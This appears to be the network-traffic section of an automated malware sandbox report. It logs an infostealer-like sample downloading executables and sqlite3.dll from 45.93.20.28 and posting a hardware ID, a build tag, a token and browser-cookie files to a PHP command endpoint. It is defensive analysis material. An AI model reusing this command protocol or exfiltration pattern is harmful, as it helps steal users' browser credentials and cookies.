00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 09 Mar 2025 21:03:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 09 Mar 2025 21:03:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 09 Mar 2025 21:03:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 09 Mar 2025 21:03:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 45.93.20.28Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBFHost: 45.93.20.28Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 45 36 34 42 32 30 32 35 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 72 75 6d 70 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="hwid"58E64B20250F807656615------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="build"trump------KFHJJJKKFHIDAAKFBFBF--
              Source: global trafficHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEGHJEGHJKFIEBFHJKKHost: 45.93.20.28Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------GIEGHJEGHJKFIEBFHJKKContent-Disposition: form-data; name="token"1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b------GIEGHJEGHJKFIEBFHJKKContent-Disposition: form-data; name="message"browsers------GIEGHJEGHJKFIEBFHJKK--
              Source: global trafficHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: 45.93.20.28Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="message"plugins------DAKEBAKFHCFHIEBFBAFB--
              Source: global trafficHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCHost: 45.93.20.28Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 2d 2d 0d 0a Data Ascii: ------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="token"1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="message"fplugins------KEHJKJDGCGDAKFHIDBGC--
              Source: global trafficHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAKHost: 45.93.20.28Content-Length: 6019Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c66c0eade263c9a8/sqlite3.dll HTTP/1.1Host: 45.93.20.28Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGIJEGHDAECAKECAFCAHost: 45.93.20.28Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 2d 2d 0d 0a Data Ascii: ------IDGIJEGHDAECAKECAFCAContent-Disposition: form-data; name="token"1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b------IDGIJEGHDAECAKECAFCAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------IDGIJEGHDAECAKECAFCAContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------IDGIJEGHDAECAKECAFCA--
              Source: global trafficHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFCFHJDBKKFHIEHIDGHost: 45.93.20.28Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 43 46 48 4a 44 42 4b 4b 46 48 49 45 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 43 46 48 4a 44 42 4b 4b 46 48 49 45 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 43 46 48 4a 44 42 4b 4b 46 48 49 45 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 43 46 48 4a 44 42 4b 4b 46 48 49 45 48 49 44 47 2d 2d 0d 0a Data Ascii: ------IJKFCFHJDBKKFHIEHIDGContent-Disposition: form-data; name="token"1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b------IJKFCFHJDBKKFHIEHIDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IJKFCFHJDBKKFHIEHIDGContent-Disposition: form-data; name="file"------IJKFCFHJDBKKFHIEHIDG--
